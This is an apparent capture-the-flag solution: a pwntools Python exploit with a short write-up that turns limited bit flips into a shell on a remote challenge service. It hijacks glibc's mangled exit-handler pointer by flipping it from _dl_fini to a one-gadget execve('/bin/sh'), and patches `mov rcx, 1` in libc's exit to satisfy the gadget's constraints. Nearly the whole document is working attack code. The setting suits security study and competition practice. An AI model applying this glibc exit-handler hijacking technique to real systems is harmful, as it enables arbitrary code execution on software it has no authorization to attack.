"""
We get 1 bit flip at any location in libc and 9 bit flips in any r/w section, plus a free libc and ld leak.
We flip bits in libc's exit handler function table, which contains "encrypted" (XORed, then rotated) pointers to functions.
We know the original function pointer before encryption is _dl_fini from ld, whose address we know from the free ld leak.
Because the mangling is an XOR followed by a fixed rotation, and our primitive flips bits, the XOR key doesn't matter: we only need our target function and _dl_fini to differ in at most 9 bits.
There are a few one-gadgets, but most are unusable because their stack constraints did not hold during testing (and could not always be fixed with the 1-2 leftover bit flips). A nicer one only needs rcx and r9 to be zero.
Whether this gadget is within 9 bits of _dl_fini depends on ASLR, so the exploit may have to be re-run a few times.
r9 is already 0, but rcx is 1 when our target function is called.
So we use the single libc bit flip (which can also target executable sections) to turn the `mov rcx, 1` into `mov rcx, 0` just before exit calls __run_exit_handlers.

- xlr8or
"""

from pwn import *
import sys

# Terminal pwntools uses when it needs to open a new window (e.g. for gdb).
context.terminal = 'st'

# Challenge binaries, loaded in a fixed order with the checksec banner suppressed.
# Only libc and ld are referenced later in this script.
libc, ld, elf1, elf2 = (
    ELF(path, checksec=False)
    for path in (
        './libc.so.6',
        './ld-linux-x86-64.so.2',
        './rooftop',
        './stairwell',
    )
)

def u(num, endian=None, sign=None):
    """Unpack the byte string *num* into an integer, whatever its length.

    Thin wrapper around pwntools' ``unpack`` with a word size of ``'all'``,
    forwarding the optional *endian* and *sign* settings unchanged.
    """
    options = {'endian': endian, 'sign': sign}
    return unpack(num, 'all', **options)

# Connect to the remote challenge by default. Pass LOCAL on the command line
# (pwntools magic `args`) to run against the local ./run wrapper instead of
# editing this line.
p = process('./run') if args.LOCAL else remote('chall.polygl0ts.ch', 6008)

def do_flip(addr, bit_idx):
    """Answer one flip request on the global tube ``p``.

    *addr* is sent at the "X coordinate:" prompt and *bit_idx* (the bit within
    that byte) at the "Y coordinate:" prompt, both as hex strings.
    """
    answers = ((b'X coordinate:', addr), (b'Y coordinate:', bit_idx))
    for prompt, value in answers:
        p.sendlineafter(prompt, hex(value).encode())

# Walk through the first seven menu prompts with empty answers; the next
# prompt is presumably the single libc-wide flip mentioned in the header.
for _ in range(7):
    p.sendlineafter(b'>', b'')

# flips `mov rcx, 1` into `mov rcx, 0` in libc.exit before the exit handlers are called
# this is required so that our onegadget's constraints are satisfied
# The libc base is not leaked until later, so this value looks like an offset
# into libc rather than an absolute address (TODO confirm with the service).
# Bit 0 of the byte at exit+5 is presumably the low bit of the immediate `1`.
off = 0x3e334+1 # libc.exit + 5
do_flip(off, 0x00)

# More empty answers until the service prints its leaks.
for _ in range(8):
    p.sendlineafter(b'>', b'')

# Leak layout as parsed here: bytes [0:8] are libc's `read` address and bytes
# [9:17] are a pointer into ld (byte 8 is presumably a separator).
leaks = p.recvuntil(b'>')
libc.address = u(leaks[:8]) - libc.sym['read']
ld_leak = u(leaks[9:17])
# 0x36000: distance from ld's base to the leaked pointer, assumed constant
# for this ld build (empirically determined — verify if ld changes).
ld.address = ld_leak - 0x36000
# Note: both lines print the computed base addresses, not the raw leaks.
print('libc leak', hex(libc.address))
print('ld leak', hex(ld.address))

def bit_diff(a, b):
    """Return the bit positions at which the non-negative integers *a* and *b* differ.

    Positions are 0-based (bit 0 is the least significant) and are listed from
    the most significant differing bit down to the least significant. The
    number of differing bits is also printed for manual inspection.

    XOR is used instead of comparing ``bin()`` strings character by character.
    The string comparison raised IndexError or compared misaligned bits when
    the two operands had different bit lengths.
    """
    delta = a ^ b
    positions = [
        i for i in range(delta.bit_length() - 1, -1, -1) if (delta >> i) & 1
    ]
    print(len(positions))
    return positions

# Maximum number of flips the service grants in r/w memory.
MAX_FLIPS = 9

# Mangled function pointer of the first handler in libc's static `initial`
# exit-function list. Offset 24 assumes glibc's struct exit_function_list
# layout (next, idx, fns[0].flavor, then fns[0]'s function pointer).
flip_loc = libc.sym['initial'] + 24

# Candidate one-gadget offsets inside libc; only gads[0] is actually used.
gads = [0xd8131, 0xf4b22, 0xf4b2a, 0xf4b2f]
target = libc.address + gads[0]
dl_fini = ld.sym['_dl_fini']

# Informational: how many flips each candidate would need for this ASLR layout.
for g in gads:
    print('gadget', hex(g), end=': ')
    bit_diff(libc.address + g, dl_fini)

# 0xd8131 execve("/bin/sh", rcx, r9)
# constraints:
#   [rcx] == NULL || rcx == NULL || rcx is a valid argv
#   [r9] == NULL || r9 == NULL || r9 is a valid envp

diffs = bit_diff(target, dl_fini)
if len(diffs) > MAX_FLIPS:
    # Unlucky ASLR: too many differing bits. Bail out so the script can be re-run.
    p.close()
    sys.exit(1)
print('OG', hex(target))  # the gadget actually written (gads[0])
print('dl fini', hex(dl_fini))

p.sendline(b'')
for _ in range(2):
    p.sendlineafter(b'>', b'')

print(diffs)
for x in diffs:
    # glibc's pointer mangling stores rol(ptr ^ key, 0x11), so bit x of the
    # plain pointer sits at bit (x + 17) % 64 of the stored 64-bit word.
    k = (x + 17) % 64
    byt_idx = k // 8  # byte within the little-endian (x86-64) word
    bit_idx = k % 8   # bit within that byte
    do_flip(flip_loc + byt_idx, bit_idx)

# Spend any leftover flips on a libc .bss byte that is assumed not to matter.
# Presumably the service expects all flips to be consumed before it exits.
for _ in range(MAX_FLIPS - len(diffs)):
    do_flip(libc.bss(0x00), 1)

p.interactive()
